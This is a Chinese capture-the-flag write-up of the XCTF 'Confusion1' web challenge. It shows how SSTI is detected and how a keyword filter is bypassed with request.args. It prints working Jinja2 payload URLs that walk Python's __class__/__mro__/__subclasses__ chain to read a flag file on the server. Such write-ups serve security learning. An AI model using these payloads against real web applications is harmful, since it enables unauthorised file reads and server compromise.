xctf攻防世界 Web高手进阶区 Confusion1

1. 直接进入场景,查看环境

xctf攻防世界 Web高手进阶区 Confusion1_第1张图片

2. 分析

  1. 映入眼帘的是神马奇葩玩意?
    思考了一下,蟒蛇(Python)?大象(ElePHPant)?两个扭扯想说明啥?。。不懂
  2. 打开控制台,看看有没有提示
    戳一戳链接,发现longin页面和register页面都有如下信息
    xctf攻防世界 Web高手进阶区 Confusion1_第2张图片
    emmm,按时flag的位置?
  3. blue-whale是什么破玩意?
    点完后更加懵逼了,大胆猜测,需要审计源码,那么尝试.git漏洞,看能不能搞到源码,如图
    xctf攻防世界 Web高手进阶区 Confusion1_第3张图片
    得,没戏,看看robots.txt同样的显示,说明不能看到源码。
  4. 如何访问到提示的flag内容
    大胆猜测,需要尝试SSTI(服务器模板注入)漏洞,从而拿到flag。
    参考思路:xctf攻防世界 Web高手进阶区 Confusion1_第4张图片
    尝试构造payload,{{7*7}}
http://111.200.241.244:62326/register.php/{{7*7}}}

如图:
xctf攻防世界 Web高手进阶区 Confusion1_第5张图片
说明SSTI漏洞,继续测试{{7*‘7’}}

http://111.200.241.244:62326/register.php/{{7*'7'}}}

如图:
xctf攻防世界 Web高手进阶区 Confusion1_第6张图片
锁定,是Jinja2或Twig模板

  1. 采用之前使用的payload,{{’’.class.mro[2].subclasses()}}
http://111.200.241.244:62326/register.php/{{''.__class__.__mro__[2].__subclasses__()}}

弹窗提示:
xctf攻防世界 Web高手进阶区 Confusion1_第7张图片
也就是说,这些关键词被过滤了。。。class、 subclasses、 read尝试后都不行。尝试采用url_for

http://111.200.241.244:62326/register.php/{{url_for.__globals__}}

如图:
xctf攻防世界 Web高手进阶区 Confusion1_第8张图片
有鉴权,也就是被过滤了。给我直接整不会了。。。想不出来,去参考大神们的wp了。

  1. 采用request.args.key方式传参
    这个方法开眼界,第一次知道。构造payload:
http://111.200.241.244:62326/{{''[request.args.a]}}?a=__class__

如图:
xctf攻防世界 Web高手进阶区 Confusion1_第9张图片
妈耶,真的可以绕过,有回显了。。。这就可以玩了,构造目标payload

http://111.200.241.244:62326/register.php/{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read

如图:
xctf攻防世界 Web高手进阶区 Confusion1_第10张图片
构造的参考理由:关于python魔术方法payload

3. 总结

  • 考察模板注入
  • payload的其他构造方法

附带大神总结的内容:

  1. 文末SSTI几个学习场景
  2. SSTI(模板注入)基础总结

如有问题,恳请批评指正。

你可能感兴趣的:(攻防世界web之路,前端,安全,web安全)